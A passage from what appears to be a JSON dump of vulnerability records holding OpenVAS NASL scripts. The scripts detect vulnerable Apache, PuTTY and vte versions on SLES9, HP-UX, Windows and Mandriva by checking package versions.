\nif(description)\n{\n script_id(65283);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2003-0020\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"SLES9: Security update for Apache2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.59~1.1\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-04-29T19:47:17", "description": "PuTTY is a free SSH client.\n This version contains a flaw that may allow a malicious user to insert\n arbitrary commands and execute them.\n The issue is triggered when an attacker sends commands,\n preceded by terminal emulator escape sequences.\n It is possible that the flaw may allow arbitrary code execution\n resulting in a loss of integrity.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "PuTTY window title escape character arbitrary command execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0069"], "modified": "2020-04-27T00:00:00", "id": "OPENVAS:136141256231014262", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231014262", "sourceData": "# OpenVAS Vulnerability Test\n# Description: PuTTY window title escape character arbitrary command execution\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2005 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.14262\");\n script_version(\"2020-04-27T11:01:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 11:01:03 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2003-0069\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"PuTTY window title escape character arbitrary command execution\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2005 David Maciejak\");\n script_family(\"Windows\");\n script_dependencies(\"gb_putty_portable_detect.nasl\", \"smb_reg_service_pack.nasl\");\n script_require_keys(\"putty/version\");\n script_tag(name:\"solution\", value:\"Upgrade to version 0.54 or newer\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"PuTTY is a free SSH client.\n This version contains a flaw that may allow a malicious user to insert\n arbitrary commands and execute them.\n The issue is triggered when an attacker sends commands,\n preceded by terminal emulator escape sequences.\n It is possible that the flaw may allow arbitrary code execution\n resulting in a loss of integrity.\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nputtyVer=get_kb_item(\"putty/version\");\nif(!puttyVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:puttyVer, test_version:\"0.53\")){\n report = report_fixed_ver(installed_version:puttyVer, vulnerable_range:\"Less than or equal to 0.53\");\n security_message(port: 0, data: report);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-02T21:10:08", "description": "PuTTY is a free SSH client.\n This version contains a flaw that may allow a malicious user to insert\n arbitrary commands and execute them.\n The issue is triggered when an attacker sends commands,\n preceded by terminal emulator escape sequences.\n It is possible that the flaw may allow arbitrary code execution\n resulting in a loss of integrity.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "PuTTY window title escape character arbitrary command execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0069"], "modified": "2017-05-01T00:00:00", "id": "OPENVAS:14262", "href": "http://plugins.openvas.org/nasl.php?oid=14262", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: putty_arbitrary_command_execution.nasl 6053 2017-05-01 09:02:51Z teissa $\n# Description: PuTTY window title escape character arbitrary command execution\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"PuTTY is a free SSH client.\n This version contains a flaw that may allow a malicious user to insert\n arbitrary commands and execute them.\n The issue is triggered when an attacker sends commands,\n preceded by terminal emulator escape sequences.\n It is possible that the flaw may allow arbitrary code execution\n resulting in a loss of integrity.\";\n\ntag_solution = \"Upgrade to version 0.54 or newer\";\n\nif(description)\n{\n script_id(14262);\n script_version(\"$Revision: 6053 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-01 11:02:51 +0200 (Mon, 01 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2003-0069\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"PuTTY window title escape character arbitrary command execution\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_putty_version.nasl\",\"secpod_reg_enum.nasl\");\n script_require_keys(\"PuTTY/Version\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nputtyVer=get_kb_item(\"PuTTY/Version\");\nif(!puttyVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:puttyVer, test_version:\"0.53\")){\n security_message(0);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:39:58", "description": "Check for the Version of Apache", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Apache HPSBUX01019", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0079", "CVE-2004-0112"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310835044", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835044", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01019\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server. HP-UX B.11.04.\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Apache. These vulnerabilities could be exploited remotely to create a Denial \n of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00944046-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835044\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01019\");\n script_cve_id(\"CVE-2003-0079\", \"CVE-2004-0112\");\n script_name( \"HP-UX Update for Apache HPSBUX01019\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.49.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.22\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.11.23\", rls:\"HPUX11.22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-IWS\", patch_list:['PHSS_30639'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-OPENSSH\", patch_list:['PHSS_30640'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultWS.WS-CORE\", patch_list:['PHSS_30641'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTGP.TGP-CORE\", patch_list:['PHSS_30642'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-IWS\", patch_list:['PHSS_30643'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-OPENSSH\", patch_list:['PHSS_30644'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultWS.WS-CORE\", patch_list:['PHSS_30645'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTGP.TGP-CORE\", patch_list:['PHSS_30646'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-IWS\", patch_list:['PHSS_30647'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultWS.WS-CORE\", patch_list:['PHSS_30648'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"HP_Webproxy.HPWEB-PX-CORE\", patch_list:['PHSS_30649'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"HP_Webproxy.HPWEB-PX-CORE\", patch_list:['PHSS_30650'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.49.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.49.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.49.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:38", "description": "Check for the Version of vte", "cvss3": {}, "published": "2010-08-30T00:00:00", "type": "openvas", "title": "Mandriva Update for vte MDVSA-2010:161 (vte)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2713", "CVE-2003-0070"], "modified": "2017-12-21T00:00:00", "id": "OPENVAS:1361412562310831137", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831137", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for vte MDVSA-2010:161 (vte)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in vte:\n\n The vte_sequence_handler_window_manipulation function in vteseq.c\n in libvte (aka libvte9) in VTE 0.25.1 and earlier, as used in\n gnome-terminal, does not properly handle escape sequences, which\n allows remote attackers to execute arbitrary commands or obtain\n potentially sensitive information via a (1) window title or (2) icon\n title sequence. NOTE: this issue exists because of a CVE-2003-0070\n regression (CVE-2010-2713).\n\n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"vte on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-08/msg00022.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831137\");\n script_version(\"$Revision: 8207 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 08:30:12 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-30 16:59:25 +0200 (Mon, 30 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:161\");\n script_cve_id(\"CVE-2003-0070\", \"CVE-2010-2713\");\n script_name(\"Mandriva Update for vte MDVSA-2010:161 (vte)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of vte\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvte9\", rpm:\"libvte9~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libvte-devel\", rpm:\"libvte-devel~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-vte\", rpm:\"python-vte~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vte\", rpm:\"vte~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64vte9\", rpm:\"lib64vte9~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64vte-devel\", rpm:\"lib64vte-devel~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvte9\", rpm:\"libvte9~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libvte-devel\", rpm:\"libvte-devel~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-vte\", rpm:\"python-vte~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vte\", rpm:\"vte~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64vte9\", rpm:\"lib64vte9~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64vte-devel\", rpm:\"lib64vte-devel~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-12T11:11:08", "description": "Check for the Version of vte", "cvss3": {}, "published": "2010-08-30T00:00:00", "type": "openvas", "title": "Mandriva Update for vte MDVSA-2010:161 (vte)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2713", "CVE-2003-0070"], "modified": "2017-12-12T00:00:00", "id": "OPENVAS:831137", "href": "http://plugins.openvas.org/nasl.php?oid=831137", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for vte MDVSA-2010:161 (vte)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in vte:\n\n The vte_sequence_handler_window_manipulation function in vteseq.c\n in libvte (aka libvte9) in VTE 0.25.1 and earlier, as used in\n gnome-terminal, does not properly handle escape sequences, which\n allows remote attackers to execute arbitrary commands or obtain\n potentially sensitive information via a (1) window title or (2) icon\n title sequence. NOTE: this issue exists because of a CVE-2003-0070\n regression (CVE-2010-2713).\n\n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"vte on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-08/msg00022.php\");\n script_id(831137);\n script_version(\"$Revision: 8082 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-12 07:31:24 +0100 (Tue, 12 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-30 16:59:25 +0200 (Mon, 30 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:161\");\n script_cve_id(\"CVE-2003-0070\", \"CVE-2010-2713\");\n script_name(\"Mandriva Update for vte MDVSA-2010:161 (vte)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of vte\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvte9\", rpm:\"libvte9~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libvte-devel\", rpm:\"libvte-devel~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-vte\", rpm:\"python-vte~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vte\", rpm:\"vte~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64vte9\", rpm:\"lib64vte9~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64vte-devel\", rpm:\"lib64vte-devel~0.22.2~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvte9\", rpm:\"libvte9~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libvte-devel\", rpm:\"libvte-devel~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-vte\", rpm:\"python-vte~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"vte\", rpm:\"vte~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64vte9\", rpm:\"lib64vte9~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64vte-devel\", rpm:\"lib64vte-devel~0.20.1~1.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:34", "description": "Check for the Version of Apache", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Apache HPSBUX01019", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0079", "CVE-2004-0112"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:835044", "href": "http://plugins.openvas.org/nasl.php?oid=835044", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01019\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server. HP-UX 